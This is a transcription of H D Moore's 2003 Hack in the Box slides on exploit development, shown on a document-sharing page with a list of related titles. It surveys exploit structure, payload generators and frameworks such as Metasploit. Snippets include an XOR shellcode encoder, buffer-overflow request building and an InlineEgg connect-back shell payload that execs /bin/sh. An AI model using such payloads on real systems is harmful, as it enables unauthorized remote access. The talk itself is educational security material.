Hack in the Box Trends and Tools. H D Moore

Similar documents
Who Am I. Chris Gates

An Introduction to MOSDEF. Dave Aitel Immunity, Inc

spoonm skape Beyond EIP

Metasploit Framework User Guide

CNIT 127: Exploit Development. Ch 3: Shellcode. Updated

Lecture 08 Control-flow Hijacking Defenses

General Pr0ken File System

Practical Anti-virus Evasion

A framework to 0wn the Web - part I -

Documentation for exploit entitled nginx 1.3.9/1.4.0 x86 Brute Force Remote Exploit

eeye Digital Security Payload Anatomy and Future Mutations Riley Hassell

Nmap & Metasploit. Chun-Jen (James) Chung. Arizona State University

This is an example C code used to try out our codes, there several ways to write this but they works out all the same.

Buffer overflow background

MOSREF: Cryptography and Injectable Virtual Machines. Wes Brown Ephemeral Security

Introduction and Overview Socket Programming Higher-level interfaces Final thoughts. Network Programming. Samuli Sorvakko/Nixu Oy

Triggering Deep Vulnerabilities Using Symbolic Execution

Introduction and Overview Socket Programming Lower-level stuff Higher-level interfaces Security. Network Programming. Samuli Sorvakko/Nixu Oy

Software Security II: Memory Errors - Attacks & Defenses

Metasm. a ruby (dis)assembler. Yoann Guillot. 20 october 2007

Pwn ing you(r) cyber offenders

CONTENTS IN DETAIL. FOREWORD by HD Moore ACKNOWLEDGMENTS INTRODUCTION 1 THE ABSOLUTE BASICS OF PENETRATION TESTING 1 2 METASPLOIT BASICS 7

The Shellcoder's Handbook Discovering and Exploiting Security Holes Second Edition

Penetration Testing with Kali Linux

TexSaw Penetration Te st in g

CSE 565 Computer Security Fall 2018

Shell Code For Beginners

Modern frameworks, modern vulnerabilities. Florent Nicolas

Secure Software Programming and Vulnerability Analysis

Hacking Blind BROP. Presented by: Brooke Stinnett. Article written by: Andrea Bittau, Adam Belay, Ali Mashtizadeh, David Mazie`res, Dan Boneh

Hackveda Training - Ethical Hacking, Networking & Security

A Security Microcosm Attacking and Defending Shiva

seccomp-nurse Nicolas Bareil ekoparty 2010 EADS CSC Innovation Works France seccomp-nurse: sandboxing environment

Basic Buffer Overflows

ISA564 SECURITY LAB. Code Injection Attacks

Remote Exploit. compass-security.com 1

Security Workshop HTS. LSE Team. February 3rd, 2016 EPITA / 40

From local user to root Ac1dB1tch3z s exploit analysis. Nicolò October 28

SA30228 / CVE

Malware

Introduction and Overview Socket Programming Higher-level interfaces Final thoughts. Network Programming. Samuli Sorvakko/Nixu Oy

From Over ow to Shell

Blackhat USA 2017 Tools Arsenal - AntiVirus Evasion Tool (AVET)

WRITING YOUR FIRST EXPLOIT LECTURE NOTES

Probabilistic Attack Planning in Network + WebApps Scenarios

Post exploitation techniques on OSX and Iphone. Vincenzo Iozzo

Module 1: Penetration Testing Planning and Scoping. Module 2: Basic Usage of Linux and its services

CSC 591 Systems Attacks and Defenses Stack Canaries & ASLR

Remote Exploit. Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona

Runtime Process Insemination

The Shellcoder's Handbook:

CSE 565 Computer Security Fall 2018

Andrés Riancho sec.com H2HC, 1

Buffer Overflow and Protection Technology. Department of Computer Science,

Shellcoding 101. by datagram LayerOne char shellcode[]=

Language Security. Lecture 40

This time. Defenses and other memory safety vulnerabilities. Everything you ve always wanted to know about gdb but were too afraid to ask

Protecting Against Unexpected System Calls

Single Packet Authorization

Stack-Based Buffer Overflow Explained. Marc Koser. East Carolina University. ICTN 4040: Enterprise Information Security

Biography. Background

Soumava Ghosh The University of Texas at Austin

Reverse Engineering Malware Binary Obfuscation and Protection

Web Application Security Payloads. Andrés Riancho SecTor 2010, Toronto, Canada.

INTRODUCTION TO EXPLOIT DEVELOPMENT

HTTP request proxying vulnerability

Jacksonville Linux User Group Presenter: Travis Phillips Date: 02/20/2013

Zero Day Zen Garden: Windows Exploit Development - Part 4 [Overwriting SEH with Buffer Overflows]

One-Slide Summary. Lecture Outline. Language Security

Linux TCP Bind Shell from Scratch with Intel x86 Assembly

Università Ca Foscari Venezia

Internet infrastructure

The SECURE Project and GCC

Hacking Blind. Andrea Bittau, Adam Belay, Ali Mashtizadeh, David Mazières, Dan Boneh. Stanford University

Buffer. This time. Security. overflows. Software. By investigating. We will begin. our 1st section: History. Memory layouts

Foundations of Python

Beyond Stack Smashing: Recent Advances in Exploiting. Jonathan Pincus(MSR) and Brandon Baker (MS)

CNIT 129S: Securing Web Applications. Ch 10: Attacking Back-End Components

ISA 564, Laboratory I: Buffer Overflows

Key Points for the Review

HW 8 CS681 & CS392 Computer Security Understanding and Experimenting with Memory Corruption Vulnerabilities DUE 12/18/2005

NetWare Kernel Stack Overflow Exploitation.

Confinement (Running Untrusted Programs)

Overflows, Injection, & Memory Safety

Sandwiches for everyone

Knit, Chisel, Hack: Crafting with Guile Scheme. Andy Wingo ~ wingolog.org

AUTHOR CONTACT DETAILS

W4118: OS Overview. Junfeng Yang

Is Exploitation Over? Bypassing Memory Protections in Windows 7

ht IE exploit analysis

C - Basics, Bitwise Operator. Zhaoguo Wang

CSC209H Lecture 9. Dan Zingaro. March 11, 2015

Generating Programs and Linking. Professor Rick Han Department of Computer Science University of Colorado at Boulder

Metasploit. Installation Guide Release 4.4

CSC 405 Computer Security Stack Canaries & ASLR

Vivisection of an Exploit: What To Do When It Isn't Easy. Dave Aitel Immunity, Inc

Vulnerability Validation Tutorial

Building Payloads Tutorial

Application Note: AN00152 xscope - Bi-Directional Endpoint

epldt Web Builder Security March 2017

Transcription:

Hack in the Box 2003 Advanced Exploit Development Trends and Tools H D Moore 1

Who Who am I? Co-founder of Digital Defense Security researcher (5+ years) Projects DigitalOffense.net Metasploit.com 2

What What is this about? 1. Exploit Trends 2. Anatomy of an Exploit 3. Common Exploit Problems 4. Payload Generators 5. Exploit Frameworks 6. Metasploit v2.0 Demo! 3

Why Why should you see this? Exploit basics and challenges Recent trends and advances New shellcode generation tools Review of exploit frameworks Exclusive look at Metasploit v2.0 4

Hack in the Box 2003 Exploit Trends 5

More Exploit Writers #1: Exploit Trends Information reached critical mass Huge exploit devel community Improved Techniques No more local brute force 4 Bytes: GOT, SEH, PEB 6

Reliable Exploit Code #1: Exploit Trends Universal win32 addresses Allocation control techniques Where Does This Lead? Shrinking exploit timeline Exploit tools and frameworks 7

Hack in the Box 2003 Anatomy of an Exploit 8

#2: Anatomy of an Exploit Exploit Components Target and option selection Network and protocol code Payload or shellcode Payload encoding routine Exploit request builder Payload handler routine 9

#2: Anatomy of an Exploit Target and option selection List of addresses and offsets Process user selected target Process other exploit options This adds up to a lot of code... 10

#2: Anatomy of an Exploit Process Options./exp -h 1.2.3.4 -p 21 -t 0 Parsing command options... Target System IP: 1.2.3.4 OS: Linux 11

#2: Anatomy of an Exploit Network and protocol code Resolve the target address Create the appropriate socket Connect the socket if needed Perform any error handling Start protocol negotiation 12

#2: Anatomy of an Exploit Process Options Network Conn gethostbyname(sockaddr) socket(af_inet,...); connect(s, &sockaddr, 16) ftp_login(s, user, pass); Connecting to target... Target System IP: 1.2.3.4 OS: Linux 13

#2: Anatomy of an Exploit Payload or shellcode Executes when exploit works Bindshell, Findsock, Adduser Normally written in assembly Stored in code as binary string Configuration done via offsets 14

#2: Anatomy of an Exploit Process Options Network Conn shellcodes[0] = \xeb... scode = shellcodes[target] scode[port] = htons(...) Setting target... Payload Target System IP: 1.2.3.4 OS: Linux 15

#2: Anatomy of an Exploit Payload encoding routine Most exploits restrict characters Encoder must filter these chars Standard type is XOR decode Often just pre-encode payload Payload options also encoded 16

#2: Anatomy of an Exploit Process Options for(x=0;x<sizeof(scode);x++) scode[x]^= 0x99; Network Conn Encoding shellcode... Payload Payload Encoder Target System IP: 1.2.3.4 OS: Linux 17

#2: Anatomy of an Exploit Exploit request builder Code which triggers the vuln Ranges from simple to complex Can require various calculations Normally just string mangling Scripting languages excel at this 18

#2: Anatomy of an Exploit Process Options Network Conn Payload Payload Encoder buf= web_request( /cgi-bin... memcpy(buf+100, scode,...); buf[480] = (char *) retaddr; send(s, buf, strlen(buf)); Sending exploit request... Target System IP: 1.2.3.4 OS: Linux Exploit Request Payload 19

#2: Anatomy of an Exploit Payload handler routine Each payload needs a handler Often just connects to bindshell Reverse connect needs listener Connects console to socket Account for large chunk of code 20

#2: Anatomy of an Exploit Process Options Network Conn Payload Payload Encoder b = socket(af_inet,...); connect(b, &sockaddr, 16); handle_shell(b) Dropping to shell... sh-2.04# id uid=0(root) gid=0(root)... Target System IP: 1.2.3.4 OS: Linux Exploit Request Payload Handler Bind Shell Payload 21

Hack in the Box 2003 Common Exploit Problems 22

#3: Common Exploit Problems Exploit code is rushed Robust code takes time Coders race to be the first Old exploits are less useful Result: lots of broken code 23

#3: Common Exploit Problems Exploiting Complex Protocols RPC, SSH, SSL, SMB Exploit depends on API Exploit supplied as patch Restricts exploit environment Requires old software archive 24

#3: Common Exploit Problems Limited Target Sets One-shot vulnerabilities suck Always limited testing resources Finding target values takes time 25

#3: Common Exploit Problems Payload Issues Most hardcode payloads Firewalls can block bind shells Custom config breaks exploit No standard payload library 26

Hack in the Box 2003 Payload Generators 27

Generator Basics #4: Payload Generators Dynamic payload creation Use a high-level language Useful for custom situations 28

#4: Payload Generators Many Generator Projects Only a few are usable Spawned from frameworks Impressive capabilities so far 29

#4: Payload Generators Impurity (Alexander Cuttergo) Shellcode downloads to memory Executable is staticly linked C Allows library functions No filesystem access required Supports Linux on x86 30

#4: Payload Generators 31

#4: Payload Generators Shellforge (Philippe Biondi ) Transforms C to payload Uses GCC and python Includes helper API Simple and usable 32

Shellforge Example: #4: Payload Generators #include "include/sfsyscall.h" int main(void) { char buf[] = "Hello world!\n"; write(1, buf, sizeof(buf)); exit(0); } 33

#4: Payload Generators MOSDEF (Immunity Inc) GPL spawn of CANVAS Dynamic code via python API loader via import tags Compile, send, exec, return Version 0.1 not ready to use 34

MOSDEF Example: #4: Payload Generators #import "remote","kernel32._lcreat" as "_lcreat" #import "string","filename" as "filename //start of code void main() { int i; i=_lcreat(filename); sendint(i,i); } 35

#4: Payload Generators InlineEgg (CORE SDI) Spawn of CORE Impact Dynamic code via python Non-commercial use only Supports Linux, BSD, Windows... 36

InlineEgg Example: egg = InlineEgg(Linuxx86Syscall) #4: Payload Generators # connect to other side sock = egg.socket(socket.af_inet,socket.sock_stream) sock = egg.save(sock) egg.connect(sock,(connect_addr, connect_port)) # dup and exec egg.dup2(sock, 0) egg.dup2(sock, 1) egg.dup2(sock, 2) egg.execve('/bin/sh',('bash','-i')) 37

Hack in the Box 2003 Exploit Frameworks 38

Framework Basics #5: Exploit Frameworks Library of common routines Simple to add new payloads Minimize development time Platform for new techniques 39

#5: Exploit Frameworks Public Exploit Frameworks Two stable commercial products Handful of open source projects New projects in stealth mode 40

#5: Exploit Frameworks CORE Impact (CORE SDI) Strong product, 2+ years old Skilled development team Massive number of exploits Python and C++ (Windows) Starts at $15,000 USD 41

#5: Exploit Frameworks CORE Impact (CORE SDI) Stable syscall proxy system Full development platform Discovery and probe modules Macro function capabilities Integrated XML reporting 42

#5: Exploit Frameworks 43

#5: Exploit Frameworks Windows ASM Components Solid design, great features Includes skeleton and manager Full source code is available Written in C and ASM Modular development system 44

#5: Exploit Frameworks Windows ASM Components Small first stage component Installs payload over network Avoid bytes with XOR encoder Fork, Bind, Connect, Findsock 45

#5: Exploit Frameworks 46

#5: Exploit Frameworks CANVAS (Immunity Inc) New and gaining ground Small set of reliable exploits Includes non-public 0-day Supports Linux & Windows Priced at $995 USD 47

#5: Exploit Frameworks CANVAS (Immunity Inc) Working syscall proxy system Solid payload encoder system Includes API for developers Exploits Solaris, Linux, Windoze Automatic SQL injection module 48

#5: Exploit Frameworks 49

#5: Exploit Frameworks LibExploit (Simon Femerling) New project, improving quickly C library to simply development Includes two sample exploits Currently supports Linux x86 Released as open source (GPL) 50

#5: Exploit Frameworks LibExploit (Simon Femerling) Includes ~30 stock payloads Generate dynamic payloads Can encode with ADMutate Common networking API Built-in exploit console 51

#5: Exploit Frameworks 52

#5: Exploit Frameworks Metasploit Exploit Framework Complete exploit environment Small set of reliable exploits Trivial to use new payloads Handlers and callbacks Full source code (OSS) 53

#5: Exploit Frameworks Metasploit Exploit Framework Modular and extensible API Protocol modules and routines Easy to add new interfaces Designed to allow embedding Very active development 54

#5: Exploit Frameworks 55

Hack in the Box 2003 Questions? 56

Hack in the Box 2003 Metasploit Framework Demonstration 57

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback